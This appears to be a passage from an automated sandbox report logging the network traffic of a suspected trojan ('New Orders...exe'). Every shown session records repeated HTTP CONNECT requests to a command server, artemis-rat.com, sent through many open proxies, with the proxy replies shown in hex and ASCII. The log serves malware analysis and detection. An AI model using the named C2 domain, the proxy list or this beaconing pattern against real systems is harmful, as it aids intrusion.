                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        226192.168.2.950543184.181.217.20641457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.541743994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        227192.168.2.950431102.130.125.86807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.541831970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.413645983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.835743904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:45.539397955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:50.835979939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:56.242115021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:01.648664951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:12.242204905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:33.429348946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        228192.168.2.949902162.214.225.223498067672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.543272018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.664412022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.687974930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.737885952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        229192.168.2.950286117.160.250.163827672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.555612087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.199368954 CET221INHTTP/1.1 403 Access Denied
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Connection: close
                                                                                        Cache-Control: no-store
                                                                                        Content-Type: text/html
                                                                                        Content-Language: en
                                                                                        Content-Length: 43
                                                                                        Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                                        Data Ascii: You are not allowed to access the document.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        230192.168.2.95058454.178.159.199180807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.557039976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.990797997 CET503INHTTP/1.1 400 Bad Request
                                                                                        Content-Type: text/html; charset=us-ascii
                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Connection: close
                                                                                        Content-Length: 324
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 55 52 4c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid URL</h2><hr><p>HTTP Error 400. The request URL is invalid.</p></BODY></HTML>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        231192.168.2.949919103.152.112.145807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.559096098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.664449930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.687974930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.737885952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        232192.168.2.949800200.25.254.193542407672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.559365988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.103241920 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        233192.168.2.95048835.154.71.7210807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.565757990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.958420992 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        234192.168.2.95046143.231.22.229807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.570197105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.382452965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        235192.168.2.9498425.252.23.22010807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.573962927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.663994074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:46.664679050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:52.773396969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:04.773890018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:16.776261091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:28.773170948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:52.773149014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        236192.168.2.950557198.44.255.3807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.574224949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.878175020 CET309INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx/1.24.0
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 157
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        237192.168.2.95054614.103.24.2080007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.576626062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.123527050 CET59INHTTP/1.1 200 Connection Established
                                                                                        Proxy-agent: nginx


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        238192.168.2.950682172.67.181.97807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.583214998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.737571001 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        239192.168.2.9505495.252.23.22010817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.584135056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        240192.168.2.950692104.25.42.178807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.590291023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.744402885 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        241192.168.2.950603174.75.211.22241457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.595695019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        242192.168.2.95055531.43.158.10888887672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.599324942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        243192.168.2.95060751.158.96.66163797672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:40.608283043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.296164036 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 